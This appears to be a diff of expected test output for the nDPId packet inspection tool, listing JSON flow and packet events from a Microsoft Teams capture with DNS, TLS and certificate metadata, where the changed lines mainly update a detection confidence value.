+00866{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":902,"source":"teams.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1587041681755,"flow_last_seen":1587041681819,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1651,"flow_avg_l4_payload_len":330,"midstream":0,"thread_ts_msec":1587041681819,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.75.69","src_port":60539,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1.2","client_requested_server_name":"eu-api.asm.skype.com","ja3":"ebf5e0e525258d7a8dcb54aa1564ecbd","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":932,"source":"teams.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041682076,"flow_last_seen":1587041682076,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1587041682076,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.75.70","src_port":60540,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":932,"source":"teams.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1587041682076,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041682076,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG+VHAqAEGNHJLRux8AbuMg\/cHAAAAALAC\/\/+l4gAAAgQFtAEDAwUBAQgKMIStbAAAAAAEAgAA"} 00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":933,"source":"teams.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041682077,"flow_last_seen":1587041682077,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1587041682077,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.75.69","src_port":60541,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":933,"source":"teams.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1587041682077,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041682077,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG+VLAqAEGNHJLRex9AbuFeblcAAAAALAC\/\/\/qlgAAAgQFtAEDAwUBAQgKMIStbQAAAAAEAgAA"} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":934,"source":"teams.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":2,"flow_last_seen":1587041682106,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1587041682106,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8XUVAAGwGcBA0cktGwKgBBgG77HwdJJF2jIP3CKASIACM5QAAAgQFoAEDAwgEAggKVscEoDCErWw="} 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":935,"source":"teams.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":3,"flow_last_seen":1587041682106,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041682106,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG+V3AqAEGNHJLRux8AbuMg\/cIHSSRd4AQEAnLdwAAAQEICjCErYpWxwSg"} -00867{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":936,"source":"teams.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041682076,"flow_last_seen":1587041682107,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":230,"flow_tot_l4_payload_len":230,"flow_avg_l4_payload_len":57,"midstream":0,"thread_ts_msec":1587041682107,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.75.70","src_port":60540,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"eu-prod.asyncgw.teams.microsoft.com","ja3":"74d5fa154a7fc0a7c655d8eaa34b89bf","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00867{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":936,"source":"teams.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041682076,"flow_last_seen":1587041682107,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":230,"flow_tot_l4_payload_len":230,"flow_avg_l4_payload_len":57,"midstream":0,"thread_ts_msec":1587041682107,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.75.70","src_port":60540,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"eu-prod.asyncgw.teams.microsoft.com","ja3":"74d5fa154a7fc0a7c655d8eaa34b89bf","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":937,"source":"teams.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":2,"flow_last_seen":1587041682108,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1587041682108,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8CPlAAG0Gw100cktFwKgBBgG77H37toO1hXm5XaASIACQKwAAAgQFoAEDAwgEAggKVQ929DCErW0="} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":938,"source":"teams.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":3,"flow_last_seen":1587041682108,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041682108,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG+V7AqAEGNHJLRex9AbuFebld+7aDtoAQEAnOvQAAAQEICjCErYtVD3b0"} -00855{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":939,"source":"teams.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041682077,"flow_last_seen":1587041682108,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":215,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1587041682108,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.75.69","src_port":60541,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1.2","client_requested_server_name":"eu-api.asm.skype.com","ja3":"74d5fa154a7fc0a7c655d8eaa34b89bf","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00855{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":939,"source":"teams.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041682077,"flow_last_seen":1587041682108,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":215,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1587041682108,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.75.69","src_port":60541,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1.2","client_requested_server_name":"eu-api.asm.skype.com","ja3":"74d5fa154a7fc0a7c655d8eaa34b89bf","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":948,"source":"teams.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041682129,"flow_last_seen":1587041682129,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1587041682129,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":49514,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":948,"source":"teams.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":1,"flow_last_seen":1587041682129,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1587041682129,"pkt":"EBMx8Tl2KDc3AG3ICABFAABIVE8AAP8R4\/3AqAEGwKgBAcFqADUANJ5TmvIBAAABAAAAAAAABmNvbmZpZwV0ZWFtcwltaWNyb3NvZnQDY29tAAABAAE="} -00781{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":948,"source":"teams.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041682129,"flow_last_seen":1587041682129,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1587041682129,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":49514,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"},"dns": {"query":"config.teams.microsoft.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} -01167{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":969,"source":"teams.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1587041682077,"flow_last_seen":1587041682140,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":6185,"flow_avg_l4_payload_len":618,"midstream":0,"thread_ts_msec":1587041682140,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.75.69","src_port":60541,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1.2","client_requested_server_name":"eu-api.asm.skype.com","server_names":"*.asm.skype.com","ja3":"74d5fa154a7fc0a7c655d8eaa34b89bf","ja3s":"986571066668055ae9481cb84fda634a","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft IT, CN=Microsoft IT TLS CA 1","subjectDN":"CN=*.asm.skype.com","alpn":"h2,http\/1.1","fingerprint":"B9:41:1D:AE:56:09:68:D2:07:D0:69:E1:68:00:08:2B:EF:63:1E:48"}} +00781{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":948,"source":"teams.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041682129,"flow_last_seen":1587041682129,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1587041682129,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":49514,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"},"dns": {"query":"config.teams.microsoft.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00878{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":955,"source":"teams.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1587041682076,"flow_last_seen":1587041682139,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1670,"flow_avg_l4_payload_len":334,"midstream":0,"thread_ts_msec":1587041682139,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.75.70","src_port":60540,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"eu-prod.asyncgw.teams.microsoft.com","ja3":"74d5fa154a7fc0a7c655d8eaa34b89bf","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +01167{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":969,"source":"teams.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1587041682077,"flow_last_seen":1587041682140,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":6185,"flow_avg_l4_payload_len":618,"midstream":0,"thread_ts_msec":1587041682140,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.75.69","src_port":60541,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1.2","client_requested_server_name":"eu-api.asm.skype.com","server_names":"*.asm.skype.com","ja3":"74d5fa154a7fc0a7c655d8eaa34b89bf","ja3s":"986571066668055ae9481cb84fda634a","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft IT, CN=Microsoft IT TLS CA 1","subjectDN":"CN=*.asm.skype.com","alpn":"h2,http\/1.1","fingerprint":"B9:41:1D:AE:56:09:68:D2:07:D0:69:E1:68:00:08:2B:EF:63:1E:48"}} 00653{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":975,"source":"teams.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":2,"flow_last_seen":1587041682143,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":204,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":204,"pkt_l4_len":170,"thread_ts_msec":1587041682143,"pkt":"KDc3AG3IEBMx8Tl2CABFAAC+wIdAADkR\/U\/AqAEBwKgBBgA1wWoAqgAAmvKBgAABAAQAAAAABmNvbmZpZwV0ZWFtcwltaWNyb3NvZnQDY29tAAABAAHADAAFAAEAAAs5ACEGY29uZmlnBXRlYW1zDnRyYWZmaWNtYW5hZ2VyA25ldADAOAAFAAEAAAALAB8MY29uZmlnLXRlYW1zBnMtMDAwNQhzLW1zZWRnZcBUwGUABQABAAAAOgACwHLAcgABAAEAAABoAAQ0ccKE"} -00799{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":975,"source":"teams.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1587041682129,"flow_last_seen":1587041682143,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":162,"flow_tot_l4_payload_len":206,"flow_avg_l4_payload_len":103,"midstream":0,"thread_ts_msec":1587041682143,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":49514,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"},"dns": {"query":"config.teams.microsoft.com","num_queries":1,"num_answers":4,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.113.194.132"}} +00799{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":975,"source":"teams.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1587041682129,"flow_last_seen":1587041682143,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":162,"flow_tot_l4_payload_len":206,"flow_avg_l4_payload_len":103,"midstream":0,"thread_ts_msec":1587041682143,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":49514,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"},"dns": {"query":"config.teams.microsoft.com","num_queries":1,"num_answers":4,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.113.194.132"}} 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":976,"source":"teams.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041682144,"flow_last_seen":1587041682144,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1587041682144,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.113.194.132","src_port":60542,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":976,"source":"teams.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":1587041682144,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041682144,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGghTAqAEGNHHChOx+AbuHxTqTAAAAALAC\/\/\/vlgAAAgQFtAEDAwUBAQgKMIStqwAAAAAEAgAA"} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":977,"source":"teams.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":2,"flow_last_seen":1587041682156,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041682156,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA0EIdAAHUGPJk0ccKEwKgBBgG77H5W9rKzh8U6lIAS\/\/\/8MgAAAgQFoAEDAwgBAQQC"} 00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":978,"source":"teams.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":3,"flow_last_seen":1587041682156,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1587041682156,"pkt":"EBMx8Tl2KDc3AG3ICABFAAAoAABAAEAGgizAqAEGNHHChOx+AbuHxTqUVvaytFAQIAAc8gAA"} -00860{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":979,"source":"teams.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041682144,"flow_last_seen":1587041682157,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1587041682157,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.113.194.132","src_port":60542,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"config.teams.microsoft.com","ja3":"ebf5e0e525258d7a8dcb54aa1564ecbd","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -01224{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1001,"source":"teams.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1587041682144,"flow_last_seen":1587041682172,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":6166,"flow_avg_l4_payload_len":513,"midstream":0,"thread_ts_msec":1587041682172,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.113.194.132","src_port":60542,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"config.teams.microsoft.com","server_names":"*.config.teams.microsoft.com,config.teams.microsoft.com","ja3":"ebf5e0e525258d7a8dcb54aa1564ecbd","ja3s":"0f14538e1c9070becdad7739c67d6363","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft IT, CN=Microsoft IT TLS CA 1","subjectDN":"CN=config.teams.microsoft.com","alpn":"h2,http\/1.1","fingerprint":"B9:54:54:12:C9:E9:43:65:10:70:04:7B:AD:B6:0C:46:06:38:A5:FA"}} +00860{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":979,"source":"teams.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041682144,"flow_last_seen":1587041682157,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1587041682157,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.113.194.132","src_port":60542,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"config.teams.microsoft.com","ja3":"ebf5e0e525258d7a8dcb54aa1564ecbd","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +01224{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1001,"source":"teams.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1587041682144,"flow_last_seen":1587041682172,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":6166,"flow_avg_l4_payload_len":513,"midstream":0,"thread_ts_msec":1587041682172,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.113.194.132","src_port":60542,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"config.teams.microsoft.com","server_names":"*.config.teams.microsoft.com,config.teams.microsoft.com","ja3":"ebf5e0e525258d7a8dcb54aa1564ecbd","ja3s":"0f14538e1c9070becdad7739c67d6363","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft IT, CN=Microsoft IT TLS CA 1","subjectDN":"CN=config.teams.microsoft.com","alpn":"h2,http\/1.1","fingerprint":"B9:54:54:12:C9:E9:43:65:10:70:04:7B:AD:B6:0C:46:06:38:A5:FA"}} 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1071,"source":"teams.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041682355,"flow_last_seen":1587041682355,"flow_idle_time":200000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":51,"flow_tot_l4_payload_len":51,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1587041682355,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":65387,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1071,"source":"teams.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":1,"flow_last_seen":1587041682355,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":93,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":93,"pkt_l4_len":59,"thread_ts_msec":1587041682355,"pkt":"EBMx8Tl2KDc3AG3ICABFAABPcIEAAP8Rx8TAqAEGwKgBAf9rADUAOydaEDoBAAABAAAAAAAADm5vcnRoZXVyb3BlY25zDnRyYWZmaWNtYW5hZ2VyA25ldAAAAQAB"} -00783{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1071,"source":"teams.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041682355,"flow_last_seen":1587041682355,"flow_idle_time":200000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":51,"flow_tot_l4_payload_len":51,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1587041682355,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":65387,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Microsoft","breed":"Safe","category":"Web"},"dns": {"query":"northeuropecns.trafficmanager.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00783{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1071,"source":"teams.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041682355,"flow_last_seen":1587041682355,"flow_idle_time":200000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":51,"flow_tot_l4_payload_len":51,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1587041682355,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":65387,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Microsoft","breed":"Safe","category":"Web"},"dns": {"query":"northeuropecns.trafficmanager.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1102,"source":"teams.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041682369,"flow_last_seen":1587041682369,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1587041682369,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60543,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 